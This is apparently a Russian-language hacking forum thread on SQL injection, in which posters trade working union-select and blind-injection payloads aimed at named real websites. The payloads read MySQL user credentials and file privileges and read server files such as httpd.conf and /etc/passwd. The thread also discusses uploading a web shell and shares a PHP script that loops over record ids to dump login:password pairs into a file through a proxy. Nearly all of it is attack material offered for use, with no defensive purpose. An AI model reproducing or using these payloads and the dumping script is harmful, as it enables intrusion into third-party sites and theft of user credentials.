вопрос по limit ни как не пойму, если сливать базу через скуль-инъекцию через limit то сливает от силы 20-30К, если же через where+id= то тянешь всю базу на 200-300К. почему limit выводит лишь часть?
посоветуйте программу или скрипт для слива бд. Чтоб прога сливала через where+id http://site.ru/news.php?id=1+union+select+1,2,name,4+from+users+where+id={index}-- а не через limit.
Подскажите, можно ли залить шелл? http://www.skyalbum.com/showAlbum/-223451+union+select+1,2,3,4,5,6,concat%28user%28%29,0x3a,user,0x3a,password,0x3a,File_Priv,0x3a,Load_File%28%27/etc/httpd/conf/httpd.conf%27%29%29,8,9,10,11,12,13,14,15+from+mysql.user-- Заранее благодарю...
http://www.skyalbum.com/showAlbum/-223451+union+select+1,2,3,4,5,6,file_priv,8,9,10,11,12,13,14,15+from+mysql.user+where+user='skyalbum_db_user'-- да можно залить...
Спасибо, но что файл прив есть я знаю, мне интересно другое, мне нужно найти полный путь, но чет не получается, может он указан в каком-нить конфиге?
/etc/httpd/conf/httpd.conf /usr/apache/httpd.conf и так далее и тому подобное..тебе эти файлы о чем нибудь говорят ? в /etc/passwd очень редко путь абсолютный я находил..
мне говорят, но я же сначала глянул на этот сайт, а ты просто сумничать решил, тут, видимо, как раз тот редкий случай, когда в пассвд есть путь, а в хттпд.конф нет: Code: flash.dvd-photo-slideshow.com:x:502:48:flash.dvd-photo-slideshow.com:[B]/var/www/flash.dvd-photo-slideshow.com[/B]:/sbin/nologin jp.flash-slideshow-maker.com:x:503:48::[B]/var/www/jp.flash-slideshow-maker.com[/B]:/sbin/nologin m4p-mp3.tuneclone.com:x:504:48::[B]/var/www/m4p-mp3.tuneclone.com[/B]:/sbin/nologin skyalbum.com:x:505:48::[B]/var/www/skyalbum.com[/B]:/sbin/nologin
а при чем тут шелл? вопрос был в том, чтобы найти абсолютный путь, я подсказал, он указан в /etc/passwd, а папку с правами на запись уж пусть сам дальше ищет что ж ты нервный-то такой
можно такой примитив заюзать например PHP: function ololo($url,$proxy='127.0.0.1') { $ch=curl_init($url); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_PROXY,$proxy); $content=curl_exec($ch); curl_close($ch); return $content; } $num='1000'; // максимальный id $regex='~<title>(.*?)</title>~'; //ну ты понел $f=fopen('db','a+'); for($i=0;$i<$num;$i++) { preg_match($regex,ololo("http://microsoft.com/billi.php?id=-1+union+select+concat_ws(0x3a,login,pass),2,3+from+billies_monkeys+where+id=$i--"),$m); fwrite($f,$m[1]."\n"); } fclose($f); не тестил, но должно работать вроде как..
как слепую точно можно: true: http://www.bookmg.ru/news/post/id.15+and+1=1 http://www.bookmg.ru/news/post/id.15+and+substring(@@version,1,1)='M' http://www.bookmg.ru/news/post/id.15+and+(select+system_user)='sa' false: http://www.bookmg.ru/news/post/id.15+and+1=0
Мог бы кто не будь рассказать или дать ссылки на русское описание по использованию(или видео) JBroFuzz? Был бы весьма признателен. P.S.Видео от создателей видел(OWASP),но может есть от наших умельцев.
используя такую конструкцию пытаюсь извлечь пассы union select password,2,3,4,5,6,7,8,9,10 from users -- выводит 1 пасс групконкат не работает union select password,2,3,4,5,6,7,8,9,10 from users limit 1 -- выводит тот же пасс union select password,2,3,4,5,6,7,8,9,10 from users limit 2 -- выводит тот же пасс union select password,2,3,4,5,6,7,8,9,10 from users limit 1,0 -- union select password,2,3,4,5,6,7,8,9,10 from users limit 1,1 -- union select password,2,3,4,5,6,7,8,9,10 from users limit 2,1 -- ничего не выводит почему так может происходить? Как правильно сделать запрос?
